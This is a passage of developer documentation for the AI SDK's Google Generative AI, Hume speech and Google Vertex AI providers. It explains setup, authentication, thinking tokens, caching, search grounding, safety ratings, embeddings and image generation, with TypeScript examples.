import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
model: google('gemini-2.5-flash-preview-04-17'),
providerOptions: {
google: {
thinkingConfig: {
thinkingBudget: 2048,
},
} satisfies GoogleGenerativeAIProviderOptions,
},
// ...
});
The following provider options are available:
- `responseModalities` (string[]): The modalities to use for the response. The following modalities are supported: `TEXT`, `IMAGE`. When not defined or empty, the model defaults to returning only text.
- `thinkingConfig` ({ thinkingBudget: number }): Optional. Configuration for the model's thinking process. Only supported by specific Google Generative AI models.
  - `thinkingBudget` (number): Optional. Gives the model guidance on the number of thinking tokens it can use when generating a response. Must be an integer in the range 0 to 24576. Setting it to 0 disables thinking. Budgets from 1 to 1024 tokens will be set to 1024. For more information see the Google Generative AI documentation.
You can use Google Generative AI language models to generate text with the generateText function:
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
model: google('gemini-1.5-pro-latest'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Google Generative AI language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
File Inputs
The Google Generative AI provider supports file inputs, e.g. PDF files.
import fs from 'fs';
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
model: google('gemini-1.5-flash'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mimeType: 'application/pdf',
},
],
},
],
});
See File Parts for details on how to use files in prompts.
Cached Content
Google Generative AI supports both explicit and implicit caching to help reduce costs on repetitive content.
Implicit Caching
Gemini 2.5 models automatically provide cache cost savings without needing to create an explicit cache. When you send requests that share common prefixes with previous requests, you'll receive a 75% token discount on cached content.
To maximize cache hits with implicit caching:
- Keep content at the beginning of requests consistent
- Add variable content (like user questions) at the end of prompts
- Ensure requests meet minimum token requirements:
- Gemini 2.5 Flash: 1024 tokens minimum
- Gemini 2.5 Pro: 2048 tokens minimum
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
// Structure prompts with consistent content at the beginning
const baseContext =
'You are a cooking assistant with expertise in Italian cuisine. Here are 1000 lasagna recipes for reference...';
const { text: veggieLasagna } = await generateText({
model: google('gemini-2.5-pro'),
prompt: `${baseContext}\n\nWrite a vegetarian lasagna recipe for 4 people.`,
});
// Second request with same prefix - eligible for cache hit
const { text: meatLasagna, response } = await generateText({
model: google('gemini-2.5-pro'),
prompt: `${baseContext}\n\nWrite a meat lasagna recipe for 12 people.`,
});
// Check cached token count in usage metadata
console.log('Cached tokens:', response.body.usageMetadata);
Explicit Caching
For guaranteed cost savings, you can still use explicit caching with Gemini 2.5 and 2.0 models:
import { google } from '@ai-sdk/google';
import { GoogleAICacheManager } from '@google/generative-ai/server';
import { generateText } from 'ai';
const cacheManager = new GoogleAICacheManager(
process.env.GOOGLE_GENERATIVE_AI_API_KEY,
);
// Supported models for explicit caching
type GoogleModelCacheableId =
| 'models/gemini-2.5-pro'
| 'models/gemini-2.5-flash'
| 'models/gemini-2.0-flash'
| 'models/gemini-1.5-flash-001'
| 'models/gemini-1.5-pro-001';
const model: GoogleModelCacheableId = 'models/gemini-2.5-pro';
const { name: cachedContent } = await cacheManager.create({
model,
contents: [
{
role: 'user',
parts: [{ text: '1000 Lasagna Recipes...' }],
},
],
ttlSeconds: 60 * 5,
});
const { text: veggieLasagnaRecipe } = await generateText({
model: google(model, { cachedContent }),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
const { text: meatLasagnaRecipe } = await generateText({
model: google(model, { cachedContent }),
prompt: 'Write a meat lasagna recipe for 12 people.',
});
Search Grounding
With search grounding, the model has access to the latest information using Google search. Search grounding can be used to provide answers around current events:
import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, providerMetadata } = await generateText({
model: google('gemini-1.5-pro', {
useSearchGrounding: true,
}),
prompt:
'List the top 5 San Francisco news from the past week.' +
'You must include the date of each article.',
});
// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
| GoogleGenerativeAIProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;
The grounding metadata includes detailed information about how search results were used to ground the model's response. Here are the available fields:
- `webSearchQueries` (string[] | null): Array of search queries used to retrieve information. Example: `["What's the weather in Chicago this weekend?"]`
- `searchEntryPoint` ({ renderedContent: string } | null): Contains the main search result content used as an entry point. The `renderedContent` field contains the formatted content.
- `groundingSupports` (Array of support objects | null): Contains details about how specific response parts are supported by search results. Each support object includes:
  - `segment`: Information about the grounded text segment:
    - `text`: The actual text segment.
    - `startIndex`: Starting position in the response.
    - `endIndex`: Ending position in the response.
  - `groundingChunkIndices`: References to supporting search result chunks.
  - `confidenceScores`: Confidence scores (0-1) for each supporting chunk.
Example response:
{
"groundingMetadata": {
"webSearchQueries": ["What's the weather in Chicago this weekend?"],
"searchEntryPoint": {
"renderedContent": "..."
},
"groundingSupports": [
{
"segment": {
"startIndex": 0,
"endIndex": 65,
"text": "Chicago weather changes rapidly, so layers let you adjust easily."
},
"groundingChunkIndices": [0],
"confidenceScores": [0.99]
}
]
}
}
Dynamic Retrieval
With dynamic retrieval, you can configure how the model decides when to turn on Grounding with Google Search. This gives you more control over when and how the model grounds its responses.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, providerMetadata } = await generateText({
model: google('gemini-1.5-flash', {
useSearchGrounding: true,
dynamicRetrievalConfig: {
mode: 'MODE_DYNAMIC',
dynamicThreshold: 0.8,
},
}),
prompt: 'Who won the latest F1 grand prix?',
});
The dynamicRetrievalConfig describes the options to customize dynamic retrieval:
- `mode`: The mode of the predictor to be used in dynamic retrieval. The following modes are supported:
  - `MODE_DYNAMIC`: Run retrieval only when the system decides it is necessary.
  - `MODE_UNSPECIFIED`: Always trigger retrieval.
- `dynamicThreshold`: The threshold to be used in dynamic retrieval (if not set, a system default value is used).
Sources
When you use Search Grounding, the model will include sources in the response.
You can access them using the sources property of the result:
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { sources } = await generateText({
model: google('gemini-2.0-flash-exp', { useSearchGrounding: true }),
prompt: 'List the top 5 San Francisco news from the past week.',
});
Image Outputs
The model gemini-2.0-flash-exp supports image generation. Images are exposed as files in the response.
You need to enable image output in the provider options using the responseModalities option.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
model: google('gemini-2.0-flash-exp'),
providerOptions: {
google: { responseModalities: ['TEXT', 'IMAGE'] },
},
prompt: 'Generate an image of a comic cat',
});
for (const file of result.files) {
if (file.mimeType.startsWith('image/')) {
// show the image
}
}
Safety Ratings
The safety ratings provide insight into the safety of the model's response. See Google AI documentation on safety settings.
Example response excerpt:
{
"safetyRatings": [
{
"category": "HARM_CATEGORY_HATE_SPEECH",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11027937,
"severity": "HARM_SEVERITY_LOW",
"severityScore": 0.28487435
},
{
"category": "HARM_CATEGORY_DANGEROUS_CONTENT",
"probability": "HIGH",
"blocked": true,
"probabilityScore": 0.95422274,
"severity": "HARM_SEVERITY_MEDIUM",
"severityScore": 0.43398145
},
{
"category": "HARM_CATEGORY_HARASSMENT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11085559,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.19027223
},
{
"category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.22901751,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.09089675
}
]
}
Troubleshooting
Schema Limitations
The Google Generative AI API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:
GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified
By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:
const result = await generateObject({
model: google('gemini-1.5-pro-latest', {
structuredOutputs: false,
}),
schema: z.object({
name: z.string(),
age: z.number(),
contact: z.union([
z.object({
type: z.literal('email'),
value: z.string(),
}),
z.object({
type: z.literal('phone'),
value: z.string(),
}),
]),
}),
prompt: 'Generate an example person for testing.',
});
The following Zod features are known to not work with Google Generative AI:
- `z.union`
- `z.record`
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| gemini-2.5-pro | | | | |
| gemini-2.5-flash | | | | |
| gemini-2.5-pro-preview-05-06 | | | | |
| gemini-2.5-flash-preview-04-17 | | | | |
| gemini-2.5-pro-exp-03-25 | | | | |
| gemini-2.0-flash | | | | |
| gemini-1.5-pro | | | | |
| gemini-1.5-pro-latest | | | | |
| gemini-1.5-flash | | | | |
| gemini-1.5-flash-latest | | | | |
| gemini-1.5-flash-8b | | | | |
| gemini-1.5-flash-8b-latest | | | | |
Embedding Models
You can create models that call the Google Generative AI embeddings API
using the .textEmbeddingModel() factory method.
const model = google.textEmbeddingModel('text-embedding-004');
Google Generative AI embedding models support additional settings. You can pass them as an options argument:
const model = google.textEmbeddingModel('text-embedding-004', {
outputDimensionality: 512, // optional, number of dimensions for the embedding
taskType: 'SEMANTIC_SIMILARITY', // optional, specifies the task type for generating embeddings
});
The following optional settings are available for Google Generative AI embedding models:
- `outputDimensionality` (number): Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.
- `taskType` (string): Optional. Specifies the task type for generating embeddings. Supported task types include:
  - `SEMANTIC_SIMILARITY`: Optimized for text similarity.
  - `CLASSIFICATION`: Optimized for text classification.
  - `CLUSTERING`: Optimized for clustering texts based on similarity.
  - `RETRIEVAL_DOCUMENT`: Optimized for document retrieval.
  - `RETRIEVAL_QUERY`: Optimized for query-based retrieval.
  - `QUESTION_ANSWERING`: Optimized for answering questions.
  - `FACT_VERIFICATION`: Optimized for verifying factual information.
  - `CODE_RETRIEVAL_QUERY`: Optimized for retrieving code blocks based on natural language queries.
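A short sketch of using such a model with the AI SDK's embed function:
import { google } from '@ai-sdk/google';
import { embed } from 'ai';
const { embedding } = await embed({
  model: google.textEmbeddingModel('text-embedding-004', {
    taskType: 'SEMANTIC_SIMILARITY', // tune the embedding for similarity search
  }),
  value: 'sunny day at the beach',
});
console.log(embedding.length); // dimensionality of the returned vector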
Model Capabilities
| Model | Default Dimensions | Custom Dimensions |
|---|---|---|
| text-embedding-004 | 768 | |
title: Hume description: Learn how to use the Hume provider for the AI SDK.
Hume Provider
The Hume provider contains speech model support for the Hume speech API.
Setup
The Hume provider is available in the @ai-sdk/hume module. You can install it with:
pnpm add @ai-sdk/hume
Provider Instance
You can import the default provider instance hume from @ai-sdk/hume:
import { hume } from '@ai-sdk/hume';
If you need a customized setup, you can import createHume from @ai-sdk/hume and create a provider instance with your settings:
import { createHume } from '@ai-sdk/hume';
const hume = createHume({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Hume provider instance:
- `apiKey` (string): API key that is being sent using the `Authorization` header. It defaults to the `HUME_API_KEY` environment variable.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Speech Models
You can create models that call the Hume speech API
using the .speech() factory method.
const model = hume.speech();
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying a voice to use for the generated audio.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { hume } from '@ai-sdk/hume';
const result = await generateSpeech({
model: hume.speech(),
text: 'Hello, world!',
voice: 'd8ab67c6-953d-4bd8-9370-8fa53a0f1453',
providerOptions: { hume: {} },
});
The following provider options are available:
- `context` (object): Either:
  - `{ generationId: string }`: A generation ID to use for context.
  - `{ utterances: HumeUtterance[] }`: An array of utterance objects for context.
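For example, a sketch that reuses a previous generation for context (the generationId value is a placeholder):
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { hume } from '@ai-sdk/hume';
const result = await generateSpeech({
  model: hume.speech(),
  text: 'And here is a follow-up sentence.',
  voice: 'd8ab67c6-953d-4bd8-9370-8fa53a0f1453',
  providerOptions: {
    hume: {
      context: { generationId: '00000000-0000-0000-0000-000000000000' }, // placeholder ID from a previous request
    },
  },
});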
Model Capabilities
| Model | Instructions |
|---|---|
| default | |
title: Google Vertex AI description: Learn how to use the Google Vertex AI provider.
Google Vertex Provider
The Google Vertex provider for the AI SDK contains language model support for the Google Vertex AI APIs. This includes support for Google's Gemini models and Anthropic's Claude partner models.
Setup
The Google Vertex and Google Vertex Anthropic providers are both available in the @ai-sdk/google-vertex module. You can install it with:
pnpm add @ai-sdk/google-vertex
Google Vertex Provider Usage
The Google Vertex provider instance is used to create model instances that call the Vertex AI API. The models available with this provider include Google's Gemini models. If you're looking to use Anthropic's Claude models, see the Google Vertex Anthropic Provider section below.
Provider Instance
You can import the default provider instance vertex from @ai-sdk/google-vertex:
import { vertex } from '@ai-sdk/google-vertex';
If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex and create a provider instance with your settings:
import { createVertex } from '@ai-sdk/google-vertex';
const vertex = createVertex({
project: 'my-project', // optional
location: 'us-central1', // optional
});
Google Vertex supports two different authentication implementations depending on your runtime environment.
Node.js Runtime
The Node.js runtime is the default runtime supported by the AI SDK. It supports all standard Google Cloud authentication options through the google-auth-library. Typical use involves setting a path to a json credentials file in the GOOGLE_APPLICATION_CREDENTIALS environment variable. The credentials file can be obtained from the Google Cloud Console.
If you want to customize the Google authentication options you can pass them as options to the createVertex function, for example:
import { createVertex } from '@ai-sdk/google-vertex';
const vertex = createVertex({
googleAuthOptions: {
credentials: {
client_email: 'my-email',
private_key: 'my-private-key',
},
},
});
Optional Provider Settings
You can use the following optional settings to customize the provider instance:
- `project` (string): The Google Cloud project ID that you want to use for the API calls. It uses the `GOOGLE_VERTEX_PROJECT` environment variable by default.
- `location` (string): The Google Cloud location that you want to use for the API calls, e.g. `us-central1`. It uses the `GOOGLE_VERTEX_LOCATION` environment variable by default.
- `googleAuthOptions` (object): Optional. The authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
  - `authClient` (object): An `AuthClient` to use.
  - `keyFilename` (string): Path to a .json, .pem, or .p12 key file.
  - `keyFile` (string): Path to a .json, .pem, or .p12 key file.
  - `credentials` (object): Object containing `client_email` and `private_key` properties, or the external account client options.
  - `clientOptions` (object): Options object passed to the constructor of the client.
  - `scopes` (string | string[]): Required scopes for the desired API request.
  - `projectId` (string): Your project ID.
  - `universeDomain` (string): The default service domain for a given Cloud universe.
- `headers` (Resolvable<Record<string, string | undefined>>): Headers to include in the requests. Can be provided in multiple formats:
  - A record of header key-value pairs: `Record<string, string | undefined>`
  - A function that returns headers: `() => Record<string, string | undefined>`
  - An async function that returns headers: `async () => Record<string, string | undefined>`
  - A promise that resolves to headers: `Promise<Record<string, string | undefined>>`
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- `baseURL` (string): Optional. Base URL for the Google Vertex API calls, e.g. to use proxy servers. By default, it is constructed using the location and project: `https://${location}-aiplatform.googleapis.com/v1/projects/${project}/locations/${location}/publishers/google`
Edge Runtime
Edge runtimes (like Vercel Edge Functions and Cloudflare Workers) are lightweight JavaScript environments that run closer to users at the network edge. They only provide a subset of the standard Node.js APIs. For example, direct file system access is not available, and many Node.js-specific libraries (including the standard Google Auth library) are not compatible.
The Edge runtime version of the Google Vertex provider supports Google's Application Default Credentials through environment variables. The values can be obtained from a json credentials file from the Google Cloud Console.
You can import the default provider instance vertex from @ai-sdk/google-vertex/edge:
import { vertex } from '@ai-sdk/google-vertex/edge';
If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex/edge and create a provider instance with your settings:
import { createVertex } from '@ai-sdk/google-vertex/edge';
const vertex = createVertex({
project: 'my-project', // optional
location: 'us-central1', // optional
});
For Edge runtime authentication, you'll need to set these environment variables from your Google Default Application Credentials JSON file:
- `GOOGLE_CLIENT_EMAIL`
- `GOOGLE_PRIVATE_KEY`
- `GOOGLE_PRIVATE_KEY_ID` (optional)
These values can be obtained from a service account JSON file from the Google Cloud Console.
Optional Provider Settings
You can use the following optional settings to customize the provider instance:
- `project` (string): The Google Cloud project ID that you want to use for the API calls. It uses the `GOOGLE_VERTEX_PROJECT` environment variable by default.
- `location` (string): The Google Cloud location that you want to use for the API calls, e.g. `us-central1`. It uses the `GOOGLE_VERTEX_LOCATION` environment variable by default.
- `googleCredentials` (object): Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
  - `clientEmail` (string): The client email from the service account JSON file. Defaults to the contents of the `GOOGLE_CLIENT_EMAIL` environment variable.
  - `privateKey` (string): The private key from the service account JSON file. Defaults to the contents of the `GOOGLE_PRIVATE_KEY` environment variable.
  - `privateKeyId` (string): The private key ID from the service account JSON file (optional). Defaults to the contents of the `GOOGLE_PRIVATE_KEY_ID` environment variable.
- `headers` (Resolvable<Record<string, string | undefined>>): Headers to include in the requests. Can be provided in multiple formats:
  - A record of header key-value pairs: `Record<string, string | undefined>`
  - A function that returns headers: `() => Record<string, string | undefined>`
  - An async function that returns headers: `async () => Record<string, string | undefined>`
  - A promise that resolves to headers: `Promise<Record<string, string | undefined>>`
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create models that call the Vertex API using the provider instance.
The first argument is the model id, e.g. gemini-1.5-pro.
const model = vertex('gemini-1.5-pro');
Google Vertex models also support some model-specific settings that are not part of the standard call settings. You can pass them as an options argument:
const model = vertex('gemini-1.5-pro', {
safetySettings: [
{ category: 'HARM_CATEGORY_UNSPECIFIED', threshold: 'BLOCK_LOW_AND_ABOVE' },
],
});
The following optional settings are available for Google Vertex models:
- `structuredOutputs` (boolean): Optional. Enable structured output. Default is `true`. This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google Vertex uses. You can use this to disable structured outputs if you need to. See Troubleshooting: Schema Limitations for more details.
- `safetySettings` (Array<{ category: string; threshold: string }>): Optional. Safety settings for the model.
  - `category` (string): The category of the safety setting. Can be one of the following:
    - `HARM_CATEGORY_UNSPECIFIED`
    - `HARM_CATEGORY_HATE_SPEECH`
    - `HARM_CATEGORY_DANGEROUS_CONTENT`
    - `HARM_CATEGORY_HARASSMENT`
    - `HARM_CATEGORY_SEXUALLY_EXPLICIT`
    - `HARM_CATEGORY_CIVIC_INTEGRITY`
  - `threshold` (string): The threshold of the safety setting. Can be one of the following:
    - `HARM_BLOCK_THRESHOLD_UNSPECIFIED`
    - `BLOCK_LOW_AND_ABOVE`
    - `BLOCK_MEDIUM_AND_ABOVE`
    - `BLOCK_ONLY_HIGH`
    - `BLOCK_NONE`
- `useSearchGrounding` (boolean): Optional. When enabled, the model will use Google search to ground the response.
- `audioTimestamp` (boolean): Optional. Enables timestamp understanding for audio files. Defaults to `false`. This is useful for generating transcripts with accurate timestamps. Consult Google's documentation for usage details. A sketch follows below.
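A hedged sketch of audioTimestamp combined with a file part (the file name and MIME type are assumptions for illustration):
import fs from 'fs';
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const { text } = await generateText({
  model: vertex('gemini-1.5-pro', { audioTimestamp: true }),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Transcribe this recording with timestamps.' },
        {
          type: 'file',
          data: fs.readFileSync('./data/meeting.mp3'), // hypothetical audio file
          mimeType: 'audio/mpeg',
        },
      ],
    },
  ],
});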
You can use Google Vertex language models to generate text with the generateText function:
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const { text } = await generateText({
model: vertex('gemini-1.5-pro'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Google Vertex language models can also be used in the streamText function
(see AI SDK Core).
Reasoning (Thinking Tokens)
Google Vertex AI, through its support for Gemini models, can also emit "thinking" tokens, representing the model's reasoning process. The AI SDK exposes these as reasoning information.
To enable thinking tokens for compatible Gemini models via Vertex, set includeThoughts: true in the thinkingConfig provider option. Since the Vertex provider uses the Google provider's underlying language model, these options are passed through providerOptions.google:
import { vertex } from '@ai-sdk/google-vertex';
import { GoogleGenerativeAIProviderOptions } from '@ai-sdk/google'; // Note: importing from @ai-sdk/google
import { generateText, streamText } from 'ai';
// For generateText:
const { text, reasoning, reasoningDetails } = await generateText({
model: vertex('gemini-2.5-flash-preview-04-17'), // Or other supported model via Vertex
providerOptions: {
google: {
// Options are nested under 'google' for Vertex provider
thinkingConfig: {
includeThoughts: true,
// thinkingBudget: 2048, // Optional
},
} satisfies GoogleGenerativeAIProviderOptions,
},
prompt: 'Explain quantum computing in simple terms.',
});
console.log('Reasoning:', reasoning);
console.log('Reasoning Details:', reasoningDetails);
console.log('Final Text:', text);
// For streamText:
const result = streamText({
model: vertex('gemini-2.5-flash-preview-04-17'), // Or other supported model via Vertex
providerOptions: {
google: {
// Options are nested under 'google' for Vertex provider
thinkingConfig: {
includeThoughts: true,
// thinkingBudget: 2048, // Optional
},
} satisfies GoogleGenerativeAIProviderOptions,
},
prompt: 'Explain quantum computing in simple terms.',
});
for await (const part of result.fullStream) {
if (part.type === 'reasoning') {
process.stdout.write(`THOUGHT: ${part.textDelta}\n`);
} else if (part.type === 'text-delta') {
process.stdout.write(part.textDelta);
}
}
When includeThoughts is true, parts of the API response marked with thought: true will be processed as reasoning.
- In `generateText`, these contribute to the `reasoning` (string) and `reasoningDetails` (array) fields.
- In `streamText`, these are emitted as `reasoning` stream parts.
File Inputs
The Google Vertex provider supports file inputs, e.g. PDF files.
import fs from 'fs';
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const { text } = await generateText({
model: vertex('gemini-1.5-pro'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mimeType: 'application/pdf',
},
],
},
],
});
See File Parts for details on how to use files in prompts.
Search Grounding
With search grounding, the model has access to the latest information using Google search. Search grounding can be used to provide answers around current events:
import { vertex } from '@ai-sdk/google-vertex';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, providerMetadata } = await generateText({
model: vertex('gemini-1.5-pro', {
useSearchGrounding: true,
}),
prompt:
'List the top 5 San Francisco news from the past week.' +
'You must include the date of each article.',
});
// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
| GoogleGenerativeAIProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;
The grounding metadata includes detailed information about how search results were used to ground the model's response. Here are the available fields:
- `webSearchQueries` (string[] | null): Array of search queries used to retrieve information. Example: `["What's the weather in Chicago this weekend?"]`
- `searchEntryPoint` ({ renderedContent: string } | null): Contains the main search result content used as an entry point. The `renderedContent` field contains the formatted content.
- `groundingSupports` (Array of support objects | null): Contains details about how specific response parts are supported by search results. Each support object includes:
  - `segment`: Information about the grounded text segment:
    - `text`: The actual text segment.
    - `startIndex`: Starting position in the response.
    - `endIndex`: Ending position in the response.
  - `groundingChunkIndices`: References to supporting search result chunks.
  - `confidenceScores`: Confidence scores (0-1) for each supporting chunk.
Example response excerpt:
{
"groundingMetadata": {
"retrievalQueries": ["What's the weather in Chicago this weekend?"],
"searchEntryPoint": {
"renderedContent": "..."
},
"groundingSupports": [
{
"segment": {
"startIndex": 0,
"endIndex": 65,
"text": "Chicago weather changes rapidly, so layers let you adjust easily."
},
"groundingChunkIndices": [0],
"confidenceScores": [0.99]
}
]
}
}
Sources
When you use Search Grounding, the model will include sources in the response.
You can access them using the sources property of the result:
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const { sources } = await generateText({
model: vertex('gemini-1.5-pro', { useSearchGrounding: true }),
prompt: 'List the top 5 San Francisco news from the past week.',
});
Safety Ratings
The safety ratings provide insight into the safety of the model's response. See Google Vertex AI documentation on configuring safety filters.
Example response excerpt:
{
"safetyRatings": [
{
"category": "HARM_CATEGORY_HATE_SPEECH",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11027937,
"severity": "HARM_SEVERITY_LOW",
"severityScore": 0.28487435
},
{
"category": "HARM_CATEGORY_DANGEROUS_CONTENT",
"probability": "HIGH",
"blocked": true,
"probabilityScore": 0.95422274,
"severity": "HARM_SEVERITY_MEDIUM",
"severityScore": 0.43398145
},
{
"category": "HARM_CATEGORY_HARASSMENT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11085559,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.19027223
},
{
"category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.22901751,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.09089675
}
]
}
For more details, see the Google Vertex AI documentation on grounding with Google Search.
Troubleshooting
Schema Limitations
The Google Vertex API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:
GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified
By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:
const result = await generateObject({
model: vertex('gemini-1.5-pro', {
structuredOutputs: false,
}),
schema: z.object({
name: z.string(),
age: z.number(),
contact: z.union([
z.object({
type: z.literal('email'),
value: z.string(),
}),
z.object({
type: z.literal('phone'),
value: z.string(),
}),
]),
}),
prompt: 'Generate an example person for testing.',
});
The following Zod features are known to not work with Google Vertex:
- `z.union`
- `z.record`
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| gemini-2.0-flash-001 | | | | |
| gemini-2.0-flash-exp | | | | |
| gemini-1.5-flash | | | | |
| gemini-1.5-pro | | | | |
Embedding Models
You can create models that call the Google Vertex AI embeddings API using the .textEmbeddingModel() factory method:
const model = vertex.textEmbeddingModel('text-embedding-004');
Google Vertex AI embedding models support additional settings. You can pass them as an options argument:
const model = vertex.textEmbeddingModel('text-embedding-004', {
outputDimensionality: 512, // optional, number of dimensions for the embedding
});
The following optional settings are available for Google Vertex AI embedding models:
- `outputDimensionality` (number): Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.
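A brief sketch of using this model with the AI SDK's embed function:
import { vertex } from '@ai-sdk/google-vertex';
import { embed } from 'ai';
const { embedding } = await embed({
  model: vertex.textEmbeddingModel('text-embedding-004', {
    outputDimensionality: 512, // truncate the returned embedding to 512 values
  }),
  value: 'sunny day at the beach',
});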
Model Capabilities
| Model | Max Values Per Call | Parallel Calls |
|---|---|---|
| text-embedding-004 | 2048 | |
Image Models
You can create Imagen models that call the Imagen on Vertex AI API
using the .image() factory method. For more on image generation with the AI SDK see generateImage().
import { vertex } from '@ai-sdk/google-vertex';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: vertex.image('imagen-3.0-generate-002'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
Further configuration can be done using Google Vertex provider options. You can validate the provider options using the GoogleVertexImageProviderOptions type.
import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexImageProviderOptions } from '@ai-sdk/google-vertex';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: vertex.image('imagen-3.0-generate-002'),
providerOptions: {
vertex: {
negativePrompt: 'pixelated, blurry, low-quality',
} satisfies GoogleVertexImageProviderOptions,
},
// ...
});
The following provider options are available:
- `negativePrompt` (string): A description of what to discourage in the generated images.
- `personGeneration` ('allow_adult' | 'allow_all' | 'dont_allow'): Whether to allow person generation. Defaults to `allow_adult`.
- `safetySetting` ('block_low_and_above' | 'block_medium_and_above' | 'block_only_high' | 'block_none'): Whether to block unsafe content. Defaults to `block_medium_and_above`.
- `addWatermark` (boolean): Whether to add an invisible watermark to the generated images. Defaults to `true`.
- `storageUri` (string): Cloud Storage URI to store the generated images.
Model Capabilities
| Model | Aspect Ratios |
|---|---|
| imagen-3.0-generate-002 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-3.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
Google Vertex Anthropic Provider Usage
The Google Vertex Anthropic provider for the AI SDK offers support for Anthropic's Claude models through the Google Vertex AI APIs. This section provides details on how to set up and use the Google Vertex Anthropic provider.
Provider Instance
You can import the default provider instance vertexAnthropic from @ai-sdk/google-vertex/anthropic:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
If you need a customized setup, you can import createVertexAnthropic from @ai-sdk/google-vertex/anthropic and create a provider instance with your settings:
import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
const vertexAnthropic = createVertexAnthropic({
project: 'my-project', // optional
location: 'us-central1', // optional
});
Node.js Runtime
For Node.js environments, the Google Vertex Anthropic provider supports all standard Google Cloud authentication options through the google-auth-library. You can customize the authentication options by passing them to the createVertexAnthropic function:
import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
const vertexAnthropic = createVertexAnthropic({
googleAuthOptions: {
credentials: {
client_email: 'my-email',
private_key: 'my-private-key',
},
},
});
Optional Provider Settings
You can use the following optional settings to customize the Google Vertex Anthropic provider instance:
